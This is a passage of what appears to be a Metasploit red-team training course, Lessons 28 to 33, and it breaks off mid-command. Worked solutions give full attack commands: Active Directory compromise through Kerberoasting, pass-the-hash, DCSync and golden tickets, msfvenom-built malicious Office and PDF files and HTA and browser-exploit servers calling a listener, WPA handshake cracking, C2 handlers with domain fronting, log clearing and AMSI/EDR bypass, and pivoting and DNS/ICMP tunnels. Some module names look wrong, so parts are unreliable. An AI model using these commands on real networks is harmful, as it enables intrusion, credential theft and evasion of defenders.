script\nmeterpreter &gt; upload /tmp/linpeas.sh /tmp/linpeas.sh\nmeterpreter &gt; shell\n$ chmod +x /tmp/linpeas.sh &amp;&amp; /tmp/linpeas.sh\n\n# 7. Escalate\n$ sudo /bin/bash\n# root shell\n$ cat /root/root.txt\nFLAG{ctf_root_flag_xyz789}\n\n# 8. 
Export session log\nmsf6 &gt; makerc /tmp/ctf_session.rc\n# Now you have a script to replay the entire session\n```\n\n\n\n---\n\n## Lesson 28: Active Directory Attack Chain\n\n### Learning Objectives\n- Build a complete AD attack chain using MSF modules\n- Perform recon: enum users, groups, trusts, shares\n- Exploit Printer Bug for privilege escalation\n- Use SMB relay attacks\n- Understand the relationship between AD attacks and MSF\n\n---\n\n### Theory/Explanation\n\n#### AD Attack Chain Overview\n\n```\nInitial Access \u2192 Recon \u2192 Privilege Escalation \u2192 Persistence \u2192 Lateral Movement \u2192 Domain Dominance\n    |              |              |                    |              |               |\n Phishing      BloodHound    Kerberoast             Golden       WMI              DCSync\n                enum         ~SPN accounts          Ticket       PsExec           krbtgt\n              LDAP enum                          Registry     WinRM             Domain\n                                                 persistence  SMB relay         controllers\n```\n\n#### Phase 1: Initial Recon\n\n```bash\n# Use MSF's LDAP module for AD enumeration\nmsf6 &gt; use auxiliary/admin/ldap/query\nset RHOSTS DC01.corp.local\nset BASE_DN \"DC=corp,DC=local\"\nset USERNAME CORP\\\\lowprivuser\nset PASSWORD Password123\nset FILTER \"(objectClass=user)\"\nrun\n\n# Use PowerView from meterpreter (if you have a session on domain-joined host)\nmeterpreter &gt; load powershell\nmeterpreter &gt; powershell_import /usr/share/powersploit/Recon/PowerView.ps1\nmeterpreter &gt; powershell_execute \"Get-NetDomain\"\nmeterpreter &gt; powershell_execute \"Get-NetDomainControllers\"\nmeterpreter &gt; powershell_execute \"Get-NetUser | Select-Object -First 30\"\n```\n\n#### Phase 2: Kerberoasting\n\n```bash\n# Find users with SPN (service accounts)\nmeterpreter &gt; powershell_execute \"Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\"\n\n# Request TGS for 
each SPN\n# Use from meterpreter:\nmeterpreter &gt; run post/windows/gather/credentials/kerberos_tickets\n\n# Or use from msfconsole:\nmsf6 &gt; use auxiliary/admin/kerberos/kerberos_ticket_export\nset SESSION 1\nrun\n\n# Crack the TGS offline\nhashcat -m 13100 -a 0 tickets.kirbi /usr/share/wordlists/rockyou.txt\n```\n\n#### Phase 3: SMB Relay Attack\n\n```bash\n# Start SMB relay module\nmsf6 &gt; use auxiliary/server/capture/smb\nset SRVHOST 10.0.0.5\nset SRVPORT 445\nrun -j\n\n# Or use Responder (external tool) to poison LLMNR/NBT-NS\n# This forces targets to authenticate to your relay\n```\n\n#### Phase 4: Pass-the-Hash (from LDAP)\n\n```bash\n# With domain admin hash:\nmsf6 &gt; use exploit/windows/smb/psexec\nset RHOSTS 192.168.1.10\nset SMBUser Administrator\nset SMBPass \nset PAYLOAD windows/x64/meterpreter/reverse_tcp\nset LHOST 10.0.0.5\nexploit\n\n# Lateral movement via WMI\nmsf6 &gt; use exploit/windows/smb/wmiexec\nset RHOSTS 192.168.1.20\nset SMBUser Administrator\nset SMBPass \nexploit\n```\n\n#### Phase 5: Domain Dominance with DCSync\n\n```bash\n# Once you have Domain Admin access:\nmeterpreter &gt; load kiwi\nmeterpreter &gt; dcsync_ntlm CORP.LOCAL\\\\krbtgt\n\n# Create golden ticket\nmeterpreter &gt; golden_ticket_create -d CORP.LOCAL -k  -s  -u Administrator\n\n# Now you have full domain persistence\n```\n\n---\n\n### Exercise 28.1\n\n**Task**: Build an AD attack chain on a practice domain (simulated):\n\n1. Enumerate domain users via LDAP module\n2. Find SPN accounts (Kerberoastable targets)\n3. Extract password hashes via hashdump\n4. Use Pass-the-Hash to lateral move to another host\n5. Get Domain Admin via DCSync\n6. Create a golden ticket\n\n```bash\n# TODO: Execute all steps\n```\n\n\n\nSolution\n\n```bash\n# 1. 
LDAP enumeration\nmsf6 &gt; use auxiliary/admin/ldap/query\nmsf6 auxiliary(admin/ldap/query) &gt; set RHOSTS DC01.corp.local\nmsf6 auxiliary(admin/ldap/query) &gt; set BASE_DN \"DC=corp,DC=local\"\nmsf6 auxiliary(admin/ldap/query) &gt; set USERNAME CORP\\\\pentester\nmsf6 auxiliary(admin/ldap/query) &gt; set PASSWORD P@ssw0rd123\nmsf6 auxiliary(admin/ldap/query) &gt; set FILTER \"(objectClass=user)\"\nmsf6 auxiliary(admin/ldap/query) &gt; run\n\n# Output: Lists all domain users with their SPNs\n\n# 2. Find SPN accounts\n# From meterpreter on domain-joined host:\nmeterpreter &gt; powershell_execute \"Get-NetUser -SPN | Select-Object samaccountname,serviceprincipalname\"\n\n# Output:\n# samaccountname    serviceprincipalname\n# svc_sql           MSSQLSvc/sql01.corp.local\n# svc_backup        MSSQLSvc/sql02.corp.local\n\n# 3. Hashdump on DC or any domain admin accessible host\nmeterpreter &gt; hashdump\n# OR from msfconsole with DA access:\nmsf6 &gt; run post/windows/gather/hashdump\n# Output: All domain hashes\n\n# 4. Pass-the-Hash lateral movement\nmsf6 &gt; use exploit/windows/smb/psexec\nmsf6 exploit(windows/smb/psexec) &gt; set RHOSTS 192.168.1.20  # second DC\nmsf6 exploit(windows/smb/psexec) &gt; set SMBUser Administrator\nmsf6 exploit(windows/smb/psexec) &gt; set SMBPass aad3b435b51404eeaad3b435b51404ee:5f4dcc3b5aa765d61d8327deb882cf99\nmsf6 exploit(windows/smb/psexec) &gt; set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/smb/psexec) &gt; set LHOST 10.0.0.5\nmsf6 exploit(windows/smb/psexec) &gt; exploit\n\n# 5. DCSync with Domain Admin\nmeterpreter &gt; load kiwi\nmeterpreter &gt; dcsync_ntlm CORP.LOCAL\\\\krbtgt\n# Extracts krbtgt hash and domain SID\n\n# 6. 
Golden ticket\nmeterpreter &gt; golden_ticket_create -d CORP.LOCAL \\\n  -k  \\\n  -s  \\\n  -u Administrator \\\n  -t /tmp/golden_ticket.kirbi\n\n# Verify with:\nmeterpreter &gt; kerberos_ticket_use /tmp/golden_ticket.kirbi\n```\n\n\n\n---\n\n## Lesson 29: Social Engineering &amp; Client-Side Attacks\n\n### Learning Objectives\n- Use MSF's client-side attack modules\n- Generate malicious documents (DOC, PDF) with embedded payloads\n- Set up an SMB relay for credential harvesting\n- Use the `browser_autocomplete` and `browser_jwe` modules\n- Understand client-side attack methodology\n\n---\n\n### Theory/Explanation\n\n#### Client-Side Attack Philosophy\n\nInstead of attacking a server directly, you attack the CLIENT (the user's workstation). You make the user connect to your malicious server or open a malicious file. When they do, you get code execution on their machine.\n\n**Common scenarios:**\n- Malicious link sent via email \u2192 user opens in browser \u2192 meterpreter\n- Malicious PDF via email \u2192 user opens \u2192 meterpreter\n- Malicious DOC via email \u2192 user enables macros \u2192 meterpreter\n- Rogue SMB server \u2192 user accesses shared folder \u2192 hash capture\n\n#### Malicious Document Generation\n\n```bash\n# Generate malicious RTF document\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n  LHOST=10.0.0.5 LPORT=4444 \\\n  -f rtf \\\n  -o malicious.rtf\n\n# Generate malicious PDF\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n  LHOST=10.0.0.5 LPORT=4444 \\\n  -f pdf \\\n  -o malicious.pdf\n\n# Generate malicious DOCX (VBA macro)\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n  LHOST=10.0.0.5 LPORT=4444 \\\n  -f docx \\\n  -o malicious.docx\n\n# Generate macro-enabled XLS\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n  LHOST=10.0.0.5 LPORT=4444 \\\n  -f psh VBA \\\n  -o macro.vba\n# Then embed in Excel via manual process\n```\n\n#### The `msfconsole` HTA Attack\n\n```bash\n# Host an HTA exploit via msfconsole\nmsf6 &gt; use 
exploit/windows/misc/hta_server\nmsf6 exploit(windows/misc/hta_server) &gt; set SRVHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) &gt; set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/misc/hta_server) &gt; set LHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) &gt; exploit -j\n# Generates: http://10.0.0.5:8080/abc123.hta\n\n# Send this link to target user\n# When they open it in IE/Edge, meterpreter fires\n```\n\n#### SMB Relay Attack\n\n```bash\n# Use Responder + MSF SMB relay\n# 1. Start Responder to poison LLMNR/NBT-NS\nresponder -I eth0 -b On\n\n# 2. When a user tries to access a share and fails,\n#    responder captures their NTLM hash\n\n# 3. Relay captured hash to another target\nmsf6 &gt; use auxiliary/server/relay_local\n# This relays hashes to targets you specify\n```\n\n#### Browser Exploitation\n\n```bash\n# Use browser_autopwn (automatic browser exploitation)\nmsf6 &gt; use auxiliary/server/browser_autopwn\nmsf6 auxiliary(server/browser_autopwn) &gt; set SRVHOST 10.0.0.5\nmsf6 auxiliary(server/browser_autopwn) &gt; set URIPATH /\nmsf6 auxiliary(server/browser_autopwn) &gt; run -j\n# Generates multiple exploit URLs for different browsers\n# When target visits, auto-exploits with best available exploit\n```\n\n---\n\n### Exercise 29.1\n\n**Task**:\n\n1. Set up an HTA server exploit in msfconsole\n2. Generate a malicious RTF document for Word\n3. Generate a macro-enabled VBA script\n4. Set up a browser_autopwn server\n5. For each: explain the attack flow and what the user needs to do\n\n```bash\n# TODO: Execute and explain\n```\n\n\n\nSolution\n\n```bash\n# 1. 
HTA Server (most reliable client-side)\nmsf6 &gt; use exploit/windows/misc/hta_server\nmsf6 exploit(windows/misc/hta_server) &gt; set SRVHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) &gt; set PAYLOAD windows/x64/meterpreter/reverse_tcp\nmsf6 exploit(windows/misc/hta_server) &gt; set LHOST 10.0.0.5\nmsf6 exploit(windows/misc/hta_server) &gt; exploit -j\n[*] URL: http://10.0.0.5:8080/PNgfvJhP.hta\n\n# Attack flow:\n# 1. Attacker sends link: http://10.0.0.5:8080/PNgfvJhP.hta\n# 2. User opens link in IE/Edge\n# 3. HTA file downloads and executes (with user confirmation)\n# 4. Meterpreter fires \u2014 no macro needed, no file to open\n\n# 2. Malicious RTF\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n  LHOST=10.0.0.5 LPORT=4444 \\\n  -f rtf \\\n  -o malicious.rtf\n\n# Attack flow:\n# 1. Attacker sends RTF via email\n# 2. User opens RTF in Word\n# 3. RTF exploits CVE-XXXX (old Word vulnerability)\n# 4. Meterpreter fires\n\n# 3. Macro VBA\nmsfvenom -p windows/meterpreter/reverse_tcp \\\n  LHOST=10.0.0.5 LPORT=4444 \\\n  -f psh VBA \\\n  -o macro.vba\n\n# Attack flow:\n# 1. Attacker sends DOCM with macro.vba embedded\n# 2. User opens document, sees \"Enable Content\" prompt\n# 3. User clicks Enable Content\n# 4. Macro executes: downloads meterpreter and runs it\n# 5. Meterpreter fires\n\n# 4. Browser Autopwn\nmsf6 &gt; use auxiliary/server/browser_autopwn\nmsf6 auxiliary(server/browser_autopwn) &gt; set SRVHOST 10.0.0.5\nmsf6 auxiliary(server/browser_autopwn) &gt; set URIPATH /\nmsf6 auxiliary(server/browser_autopwn) &gt; run -j\n[*] Starting exploit generator...\n[*] Browsers supported: [mshtml, chromefox, firefox]\n[*] URL: http://10.0.0.5:8080/\n\n# Attack flow:\n# 1. Attacker sends link: http://10.0.0.5:8080/\n# 2. User opens link in any browser\n# 3. Autopwn tests each browser and exploits the best available\n# 4. 
Meterpreter fires on first successful exploit\n```\n\n\n\n---\n\n## Lesson 30: Wireless Attacks &amp; Radio Frequency Exploitation\n\n### Learning Objectives\n- Use `aircrack-ng` suite for wireless reconnaissance\n- Use `hostapd-wpe` for WPA enterprise attacks\n- Understand the MSF wireless modules\n- Perform wireless network enumeration\n- Capture and crack WPA handshakes\n\n---\n\n### Theory/Explanation\n\n#### MSF Wireless Modules\n\nMSF has limited wireless capabilities \u2014 primarily for reporting and data management:\n\n```bash\n# These modules primarily manage data from wireless reconnaissance\n# not active wireless attacks\n\n# Import and manage wireless data\nmsf6 &gt; use auxiliary/client/socket/reverse_tcp\n# This is not wireless-specific\n\n# The primary wireless attack tools are external:\n# - aircrack-ng suite\n# - hostapd-wpe\n# - wifite2\n# - hcxdumptool\n```\n\n#### Wireless Recon with aircrack-ng\n\n```bash\n# Put interface in monitor mode\nairmon-ng start wlan0\n# Creates: wlan0mon\n\n# Capture traffic\nairodump-ng wlan0mon -w /tmp/capture --output-format pcap\n\n# Target a specific network\nairodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF \\\n  -c 6 \\\n  --essid CorpWiFi \\\n  -w /tmp/corp_wifi\n\n# Deauth to force reconnection (grab handshake)\naireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF -c TARGET_CLIENT\n\n# Crack WPA handshake\naircrack-ng -w /usr/share/wordlists/rockyou.txt \\\n  -b AA:BB:CC:DD:EE:FF /tmp/corp_wifi.cap\n```\n\n#### WPA Enterprise Attacks\n\n```bash\n# Set up rogue AP with hostapd-wpe\nhostapd-wpe /etc/hostapd-wpe.conf\n\n# Configuration example:\n# interface=wlan0mon\n# ssid=CorpWiFi\n# driver=nl80211\n# ieee8021x=1\n# eap_server=1\n# eap_user_file=/etc/hostapd-wpe.eap_user\n# Credentials captured when user connects to your fake AP\n```\n\n#### MSF Integration with Wireless\n\n```bash\n# After capturing handshake, import into MSF for management\n# MSF doesn't crack WPA \u2014 use hashcat or aircrack-ng\n\n# Store 
wireless data in MSF database\n# (after using airodump-xml2sql or similar import)\n\n# Use MSFCREDENTIAL to store cracked passwords\nmsf6 &gt; creds add user:admin hash:5f4dcc3b5aa765d61d8327deb882cf99\n```\n\n---\n\n### Exercise 30.1\n\n**Task**:\n\n1. List all wireless interfaces and put one in monitor mode\n2. Run airodump-ng to discover nearby networks\n3. Target a specific network and capture a handshake\n4. Crack the handshake using hashcat\n5. Store the cracked credentials in the MSF database\n\n```bash\n# TODO: Execute wireless attack steps\n```\n\n\n\nSolution\n\n```bash\n# 1. Monitor mode\niwconfig  # list interfaces\nairmon-ng start wlan0\n# or: ip link set wlan0 down &amp;&amp; iw dev wlan0 set monitor mode &amp;&amp; ip link set wlan0 up\n\n# 2. Discover networks\nairodump-ng wlan0mon\n# Output:\n# CH  6  SSID             BSSID             ENCRYPTION  AUTH\n# 6   CorpWiFi           AA:BB:CC:DD:EE:FF  WPA2        PSK\n# 6   GuestWiFi          11:22:33:44:55:66  WPA2        PSK\n\n# 3. Target and capture handshake\nairodump-ng wlan0mon -c 6 --bssid AA:BB:CC:DD:EE:FF -w /tmp/corp --output-format pcap\n\n# In another terminal, deauth to force reconnection:\naireplay-ng wlan0mon -0 5 -a AA:BB:CC:DD:EE:FF -c FF:EE:DD:CC:BB:AA\n\n# Wait for handshake in airodump output:\n# [WPA handshake: AA:BB:CC:DD:EE:FF]\n\n# 4. Crack with hashcat\n# Convert to hccapx format\n# Using hashcat tools:\n# ./cap2hccapx.bin /tmp/corp-01.cap /tmp/corp.hccapx\n\n# Crack:\nhashcat -m 2500 -a 0 /tmp/corp.hccapx /usr/share/wordlists/rockyou.txt\n\n# 5. 
Store in MSF database\nmsf6 &gt; creds add user:admin host:192.168.1.50 service:wifi \\\n  password:SuperSecret123 \\\n  'cracked_password:SuperSecret123'\n```\n\n\n\n---\n\n# Module 7: Red Team Operations with Metasploit\n\n---\n\n## Lesson 31: Red Team vs Penetration Testing\n\n### Learning Objectives\n- Understand the difference between penetration testing and red team operations\n- Plan a red team engagement: scope, objectives, rules of engagement\n- Use C2 frameworks alongside MSF for advanced operations\n- Understand operational security (OPSEC) during engagements\n- Coordinate red team with blue team (threat emulation)\n\n---\n\n### Theory/Explanation\n\n#### Penetration Testing vs Red Team\n\n| Aspect | Penetration Test | Red Team |\n|--------|-----------------|----------|\n| **Goal** | Find vulnerabilities | Achieve objectives (data breach, domain dominance) |\n| **Scope** | Specific systems/networks | Full organization (physical, social, technical) |\n| **Duration** | Days to weeks | Weeks to months |\n| **Phases** | Quick, thorough scanning | Slow, stealthy, persistent |\n| **Success** | Findings count | Objective achieved |\n| **Stealth** | Moderate | Critical |\n\n#### Red Team Engagement Planning\n\n```bash\n# Rules of Engagement Document\n# ============================\n# Scope: All corporate systems at 192.168.1.0/24 and 10.10.10.0/24\n# Objectives:\n#   1. Obtain Domain Admin\n#   2. Access financial systems\n#   3. 
Exfiltrate sample data (simulated)\n# Rules:\n#   - No denial of service\n#   - No physical access\n#   - Weekly status reports\n#   - Immediate notification of DBAN access\n#   - Engagement duration: 30 days\n```\n\n#### C2 Frameworks\n\nC2 (Command and Control) frameworks extend MSF capabilities for long-term operations:\n\n| Framework | Language | Notes |\n|-----------|---------|-------|\n| **Covenant** | C# (.NET) | Cross-platform, pivoting, rich UI |\n| **Cobalt Strike** | Java | Commercial, best-in-class, Beacon payload |\n| **Sliver** | Go | Open-source, cross-platform, advanced EDR evasion |\n| **Mythic** | Python | Modern, containerized, browser scriptable |\n| **Koadic** | Python | JScript/VBS COM-based, Windows focus |\n\n#### OPSEC Principles\n\nOperational Security (OPSEC) keeps your operation undetected:\n\n```\nOPSEC Rules for Red Team:\n========================\n1. Callbacks to same IP/port = pattern\n   Fix: Rotate LHOST, use domain fronting, CDN redirects\n\n2. Repeated exploitation = detection\n   Fix: Use legitimate credentials, living-off-the-land (LotL)\n\n3. Large payloads in memory = AV triggering\n   Fix: Small stagers, AMSI bypass, segmented execution\n\n4. Scheduled callbacks = network anomaly\n   Fix: Randomize intervals, use domain-relative timing\n\n5. Standard payload paths = file-based detection\n   Fix: In-memory execution, Schrang (process hollowing)\n```\n\n#### MSF in Red Team Engagements\n\n```bash\n# MSF is typically used for:\n# 1. Initial access (when C2 is not yet deployed)\n# 2. Quick assessment scanning\n# 3. Credential harvesting\n# 4. Lateral movement when C2 is detected/banned\n\n# Cobalt Strike + MSF workflow:\n# 1. MSF: Initial scan and exploitation\n# 2. MSF: Get first beacon on target\n# 3. Cobalt Strike: Install C2, pivot through network\n# 4. 
MSF: For targets that block/beacon detected\n\n# Using Metasploit as a C2:\nmsf6 &gt; use exploit/multi/handler\nset PAYLOAD windows/x64/meterpreter/reverse_https\nset LHOST dailybuild.pw\nset LPORT 443\nset ExitOnSession false\nexploit -j\n\n# Domain fronting (use CDN as proxy):\n# Set ReverseListenerRedirect to true\n# Use CDN domain as LHOST (e.g., cloudfront)\n```\n\n---\n\n### Exercise 31.1\n\n**Task**: \n\n1. Create a Red Team Rules of Engagement document (in Thai and English) for a simulated engagement\n2. Define the objectives hierarchy (primary, secondary, tertiary)\n3. Create an OPSEC checklist with at least 10 items\n4. Set up a multi/handler with `reverse_https` payload (more stealthy than `reverse_tcp`)\n5. Explain how domain fronting would work in this scenario\n\n```bash\n# TODO: Create the document\n```\n\n\n\nSolution\n\n```bash\n# 1. Rules of Engagement (ROE)\ncat &gt; /tmp/ROE.md &lt;&lt; 'EOF'\n# RED TEAM ENGAGEMENT RULES OF ENGAGEMENT\n# Organization: Example Corp\n# Duration: 30 days\n# Classification: Confidential\n\n## OBJECTIVES\n\n### Primary\n1. Obtain Domain Admin access\n2. Access and demonstrate exfiltration of financial data\n3. Gain access to R&amp;D systems\n\n### Secondary\n1. Establish persistent access on 5+ systems\n2. Demonstrate ability to move laterally to internal VLANs\n3. Compromise backup systems\n\n### Tertiary\n1. Access CEO workstation\n2. Demonstrate ability to access physical security systems\n\n## RULES\n\n1. NO Denial of Service attacks on production systems\n2. NO destructive data wipes (wipe simulations only with approval)\n3. NO social engineering that could cause real-world harm\n4. NO targeting of personal devices outside scope\n5. All exploitation documented with timestamps\n6. Immediate escalation if exfiltration detected by blue team\n7. Weekly status reports every Monday\n8. All C2 traffic must be indistinguishable from normal HTTPS\n9. Persistence mechanisms must survive system reboots\n10. 
Blue team must NOT be tipped off before engagement ends\n\n## COMMUNICATION\n\n- Emergency contact: +66-xxx-xxxx\n- Signal channel: [REDACTED]\n- Engagement code word: PHOENIX\n- Abort code word: BANGKOK\nEOF\n\n# 2. Objectives hierarchy (already in ROE above)\n\n# 3. OPSEC Checklist\ncat &gt; /tmp/OPSEC_CHECKLIST.md &lt;&lt; 'EOF'\n# OPSEC Checklist (10+ items)\n\n## Network OPSEC\n[x] Rotate LHOST every 48 hours\n[x] Use domain fronting for C2 callbacks\n[x] Randomize callback intervals (jitter: 10-30%)\n[x] Use legitimate CDN as proxy (CloudFront, Azure CDN)\n[x] Avoid hardcoded IPs in payloads\n[x] Certificate pinning for C2 comms\n[ ] Domain reputation management (freshly registered domains)\n\n## Host OPSEC\n[x] Avoid writing files to disk when possible\n[x] Use LOLBins (Living-off-the-Land binaries) for execution\n[x] Clear event logs after exploitation\n[x] Disable PowerShell script block logging\n[x] Use process injection to blend with legitimate processes\n[x] Avoid spawning obvious malicious processes (cmd.exe + nc.exe)\n\n## Payload OPSEC\n[x] AV evasion (encoding, packing, custom stagers)\n[x] AMSI bypass before running .NET scripts\n[x] EDR userland hooking bypass (syscall direct)\n[x] Avoid API calls that trigger ETW (Event Tracing for Windows)\n[x] Sleep/jitter before executing suspicious code\n\n## Credential OPSEC\n[x] Use Kerberos tickets instead of NTLM hashes where possible\n[x] Avoid saving credentials to disk\n[x] Use DCSync carefully (loud operation)\n[x] Golden ticket lifetime limited to 8 hours max\nEOF\n\n# 4. 
Multi-handler with reverse_https (stealth)\nmsfconsole -q\nmsf6 &gt; use exploit/multi/handler\nmsf6 exploit(multi/handler) &gt; set PAYLOAD windows/x64/meterpreter/reverse_https\nmsf6 exploit(multi/handler) &gt; set LHOST cobalt.example.com\nmsf6 exploit(multi/handler) &gt; set LPORT 443\nmsf6 exploit(multi/handler) &gt; set ExitOnSession false\nmsf6 exploit(multi/handler) &gt; set HandlerSSLCert /tmp/cert.pem\nmsf6 exploit(multi/handler) &gt; exploit -j\n\n# 5. Domain Fronting Explanation:\n# Domain fronting works by:\n# 1. Attacker registers a legitimate CDN domain (e.g., cloudfront.com)\n# 2. Attacker sets up C2 infrastructure behind the CDN\n# 3. Victim's HTTPS request goes to CDN with SNI:attacker-domain\n# 4. CDN routes to attacker backend based on Host header\n# 5. Firewall sees: legitimate cloudfront.com -&gt; allowed\n# 6. Actual traffic: attacker-payload, invisible to firewall\n#\n# Implementation:\n# Use CloudFront as front, redirect Host: dailybuild.pw\n# Meterpreter connects to cloudfront.com:443\n# But Host header says dailybuild.pw\n# CloudFront routes to dailybuild.pw backend\n# Traffic appears as normal HTTPS to cloudfront\n```\n\n\n\n---\n\n## Lesson 32: Pivoting, Tunneling &amp; Covert Channels\n\n### Learning Objectives\n- Create covert tunnels through Meterpreter sessions\n- Use portfwd and SOCKS proxy for pivoting\n- Understand DNS tunneling and ICMP tunneling\n- Use ProxyChains to tunnel any tool through MSF sessions\n- Set up VPN pivoting through compromised hosts\n\n---\n\n### Theory/Explanation\n\n#### Port Forwarding (Meterpreter)\n\n```bash\n# Forward local port to remote host\nmeterpreter &gt; portfwd add -l 8080 -p 80 -r 10.10.10.50\n# Now: curl http://127.0.0.1:8080 \u2192 10.10.10.50:80 via meterpreter\n\n# Forward remote port to local\nmeterpreter &gt; portfwd add -l 3306 -p 3306 -r 127.0.0.1\n# Now: mysql -h 127.0.0.1 \u2192 remote MySQL via meterpreter\n\n# List all forwards\nmeterpreter &gt; portfwd\n\n# Delete 
forward\nmeterpreter &gt; portfwd delete -l 8080 -p 80 -r 10.10.10.50\n\n# Flush all\nmeterpreter &gt; portfwd flush\n```\n\n#### SOCKS Proxy for Tool Chaining\n\n```bash\n# Create SOCKS proxy server in MSF\nmsf6 &gt; use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) &gt; set SRVHOST 127.0.0.1\nmsf6 auxiliary(server/socks_proxy) &gt; set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) &gt; run -j\n\n# Configure /etc/proxychains.conf\ncat &gt;&gt; /etc/proxychains.conf &lt;&lt; 'EOF'\n# Add at end:\nsocks4 127.0.0.1 1080\nEOF\n\n# Now tunnel ANY tool through MSF session:\nproxychains nmap -sT -sV 10.10.10.0/24\nproxychains ssh user@10.10.10.50\nproxychains hydra -L users.txt -P pass.txt 10.10.10.50 ssh\nproxychains firefox http://10.10.10.50  # Browse internal web\n```\n\n#### SSH Tunneling via Meterpreter\n\n```bash\n# If target has SSH access, pivot through it\nmeterpreter &gt; shell\n$ ssh -D 1080 user@internal-ssh-server\n# Creates SOCKS proxy through SSH tunnel\n\n# Or reverse tunnel: from target to attacker\n# From meterpreter shell on target:\n$ ssh -R 8080:127.0.0.1:80 user@10.0.0.5\n# Now: attacker:8080 \u2192 target's localhost:80\n```\n\n#### VPN Pivoting (Meterpreter)\n\nMeterpreter supports VPN pivoting for full network access:\n\n```bash\n# Create VPN interface through meterpreter\nmeterpreter &gt; run post/network/manage/vpn\n\n# Or use autoroute for full routing:\nmeterpreter &gt; run post/multi/manage/autoroute\n# This adds routes to MSF for the entire internal network\n```\n\n#### DNS Tunneling\n\n```bash\n# DNS tunneling: encapsulate data in DNS queries\n# This works when only DNS is allowed out\n\n# Using dnscat2 (external tool):\n# On attacker:\ndnscat2-server example.com\n\n# On target (behind firewall):\ndnscat2-client --dns-server=10.0.0.5 --domain=example.com\n\n# Now you have a C2 channel over DNS\n# Commands are encoded in DNS TXT records\n```\n\n#### ICMP Tunneling\n\n```bash\n# Tunnel traffic through ICMP (ping) 
packets\n# Useful when only ping is allowed out\n\n# Using ptunnel-ng:\n# On attacker:\nptunnel-ng -p \n\n# On target:\nptunnel-ng -p  -l  -r  -R \n\n# Now: target:local_port \u2192 attacker \u2192 remote_ip:remote_port\n```\n\n---\n\n### Exercise 32.1\n\n**Task**:\n\n1. Set up portfwd from your Kali machine to reach an internal web server at 10.10.10.50:80 via your meterpreter session\n2. Create a SOCKS proxy server on port 1080\n3. Configure proxychains to use the SOCKS proxy\n4. Use `proxychains nmap` to scan the internal network\n5. Demonstrate tunneling SSH through the Meterpreter session\n\n```bash\nmeterpreter &gt; # TODO\n```\n\n\n\nSolution\n\n```bash\n# 1. Port forwarding (from meterpreter)\nmeterpreter &gt; portfwd add -l 8080 -p 80 -r 10.10.10.50\n[*] Local TCP relay: 0.0.0.0:8080 &lt;-&gt; 10.10.10.50:80\n\n# Now on Kali, test the forward:\ncurl http://127.0.0.1:8080\n# Should show internal web server content\n\n# 2. SOCKS proxy (from msfconsole, not meterpreter)\n# background meterpreter first\nmeterpreter &gt; background\nmsf6 &gt; use auxiliary/server/socks_proxy\nmsf6 auxiliary(server/socks_proxy) &gt; set SRVHOST 127.0.0.1\nmsf6 auxiliary(server/socks_proxy) &gt; set SRVPORT 1080\nmsf6 auxiliary(server/socks_proxy) &gt; run -j\n[*] Auxiliary module running as background job 1.\n[*] Starting SOCKS proxy on 127.0.0.1:1080.\n\n# 3. Configure proxychains\ncat &gt; /tmp/proxychains.conf &lt;&lt; 'EOF'\ndynamic_chain\nproxy_dns\ntcp_read_time_out 15000\ntcp_connect_time_out 8000\n[ProxyList]\nsocks4 127.0.0.1 1080\nEOF\n\ncp /tmp/proxychains.conf /etc/proxychains.conf\n\n# 4. Scan internal network via proxychains\n# Add route to MSF first:\nmsf6 &gt; route add 10.10.10.0 255.255.255.0 1\n# Now MSF routes through session 1\n\n# But proxychains goes through the SOCKS proxy:\nproxychains nmap -sT -sV -p 22,80,443 10.10.10.50\n# Output shows open ports on internal host through tunnel\n\n# 5. 
SSH tunnel through meterpreter\nmeterpreter &gt; shell\n$ ssh -D 1080 -C -N user@internal-ssh-server\n# -D 1080: creates SOCKS proxy on port 1080\n# -C: compress\n# -N: don't execute remote command (just tunnel)\n\n# Now you can use the SSH tunnel as another SOCKS proxy\n# Or in proxychains.conf add:\n# socks4 127.0.0.1 1080\n```\n\n\n\n---\n\n## Lesson 33: Building Your MSF Infrastructure\n\n### Learning Objectives\n- Set up a secure Metasploit database with PostgreSQL\n- Configure MSF for high-performance scanning\n- Set up a team server for collaborative assessments\n- Configure logging and audit trails\n- Build scripts for rapid deployment\n\n---\n\n### Theory/Explanation\n\n#### Database Setup\n\n```bash\n# PostgreSQL setup for MSF\nsudo apt update &amp;&amp; sudo apt install postgresql\n\n# Create MSF database user\nsudo -u postgres createuser msf -P\n# Enter password: your_secure_password\n\n# Create database\nsudo -u postgres createdb -O msf msfdb\n\n# Initialize\nmsfdb init\n\n# Configure MSF to use external database\n# Edit: ~/.msf4/database.yml\ncat &gt; ~/.msf4/database.yml &lt;&lt; 'EOF'\nproduction:\n  adapter: postgresql\n  database: msfdb\n  username: msf\n  password: your_secure_password\n  host: 127.0.0.1\n  port: 5432\n  pool: 5\n  timeout: 5\nEOF\n\n# Connect\nmsfconsole -q\nmsf6 &gt; db_status\n[*] postgresql connected to msfdb\n```\n\n#### High-Performance Configuration\n\n```bash\n# ~/.msf4/msf4.yml\n# Tune performance for large assessments\ncat &gt; ~/.msf4/msf4.yml &lt;&lt; 'EOF'\n# Performance\nperformance:\n  thread_limit: 20\n  nmap_max_parallel_sockets: 10\n  mass_assessment_max: 500\n\n# Database\ndb:\n  mass_assessment_import: true\n  auto_collapse_note_types:\n    - vulnerability\n    - vuln\n    - cve\n\n# Logging\nlogging:\n  level: verbose\n  api_log: /var/log/msf/api.log\nEOF\n```\n\n#### Team Server Setup\n\n```bash\n# For collaborative assessments, use MSF RPC daemon\n# Start msfrpcd\nmsfdb stop\nmsfrpcd -U team -P 
